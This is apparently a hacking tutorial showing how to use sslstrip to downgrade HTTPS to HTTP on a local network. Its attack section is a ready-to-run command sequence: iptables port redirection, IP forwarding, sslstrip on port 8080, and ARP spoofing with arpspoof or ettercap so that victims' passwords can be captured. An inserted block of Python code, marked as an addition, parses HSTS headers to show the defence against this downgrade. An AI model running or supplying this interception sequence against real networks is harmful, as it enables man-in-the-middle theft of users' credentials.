SSL Strip

This is a very useful tool. It terminates the HTTPS session on the attacker's machine and forwards the traffic to the victim over plain HTTP.

It is "created by Moxie Marlinspike who provides a demonstration of the HTTPS stripping attacks that he presented at Black Hat DC 2009. It will transparently hijack HTTP traffic on a network, watch for HTTPS links and redirects, then map those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon which looks like a lock icon, selective logging, and session denial." (Taken from the author's website; see the link at the bottom of the page.)

This all happens on the fly and is practically invisible to users. The only visible sign is the URL in the address bar: where it would normally show HTTPS, it now shows HTTP.
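The downgrade described above only works if the browser is still willing to fetch the rewritten http:// links. The standard server-side countermeasure is HTTP Strict Transport Security (RFC 6797): once a browser has cached a valid policy from an HTTPS response, it refuses plain HTTP to that host for max-age seconds. The following is an added example, not part of sslstrip or of the original tutorial; it parses the Strict-Transport-Security header and decides whether a cached policy would block the stripped request. The sample headers and the hostnames bank.example, shop.example and blog.example are constructed for the demo.

```python
"""Check whether a cached HSTS policy (RFC 6797) would stop the HTTPS->HTTP downgrade
that sslstrip performs. Added example, not part of sslstrip; sample headers are constructed."""
from dataclasses import dataclass
from typing import Optional

@dataclass
class HstsPolicy:
    max_age: int              # seconds the browser must keep using HTTPS for the host
    include_subdomains: bool  # policy also covers every subdomain
    preload: bool             # site asks to be shipped in browser preload lists

def parse_hsts(value: str) -> Optional[HstsPolicy]:
    """Parse a Strict-Transport-Security field value; None if the header is invalid."""
    max_age, include_sub, preload, seen = None, False, False, set()
    for raw in value.split(";"):
        directive = raw.strip()
        if not directive:
            continue
        name, _, val = directive.partition("=")
        name, val = name.strip().lower(), val.strip().strip('"')
        if name in seen:            # duplicated directives invalidate the whole header
            return None
        seen.add(name)
        if name == "max-age":
            if not val.isdigit():   # max-age must be a non-negative integer
                return None
            max_age = int(val)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return None if max_age is None else HstsPolicy(max_age, include_sub, preload)

def downgrade_blocked(headers: dict, policy_host: str, target_host: str, over_tls: bool) -> bool:
    """True if a browser that cached policy_host's response would refuse plain http:// to target_host."""
    if not over_tls:                # HSTS seen over plain HTTP (e.g. through the strip) is ignored
        return False
    value = next((v for k, v in headers.items() if k.lower() == "strict-transport-security"), None)
    policy = parse_hsts(value) if value is not None else None
    if policy is None or policy.max_age == 0:   # no policy, or max-age=0 which clears one
        return False
    if target_host == policy_host:
        return True
    return policy.include_subdomains and target_host.endswith("." + policy_host)

SAMPLE_HEADERS = {  # constructed responses, one per origin, for the demo
    "bank.example": {"Strict-Transport-Security": "max-age=31536000; includeSubDomains; preload"},
    "shop.example": {"strict-transport-security": "max-age=0"},
    "blog.example": {"Content-Type": "text/html"},
}
```

Note the first-visit gap the `over_tls` flag models: a host whose policy the browser has never received over HTTPS (and that is not on a preload list) is not protected, which is exactly the window the tool exploits.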

Download SSLSTRIP from http://www.thoughtcrime.org/software/sslstrip/

cd /pentest/exploits
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
tar xvzf sslstrip-0.9.tar.gz
cd sslstrip-0.9/

Optional:

python setup.py install

We need to set up a firewall rule (using iptables), if one is not already in place, to redirect requests arriving on port 80 to port 8080, the port SSL Strip listens on.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Enable forwarding:

echo '1' > /proc/sys/net/ipv4/ip_forward

Start SSL Strip in a new terminal (CTRL+ALT+T):

sslstrip -l 8080

If you're in a network where ARP spoofing is necessary (a switched Ethernet network), use arpspoof as well, with ettercap capturing the passwords:

arpspoof -i eth0 192.168.8.8
ettercap -Tq -i eth0

Or use ettercap to do the ARP spoofing as well:

Edit /etc/etter.conf and uncomment the iptables lines:

nano /etc/etter.conf

# if you use iptables:
  redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
  redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Start the capture with ettercap:

ettercap -Tql -i wlan1 -M arp:remote // //

Links:

http://vishnuvalentino.com/hacking-tutorial/break-ssl-protection-using-sslstrip-and-backtrack-5/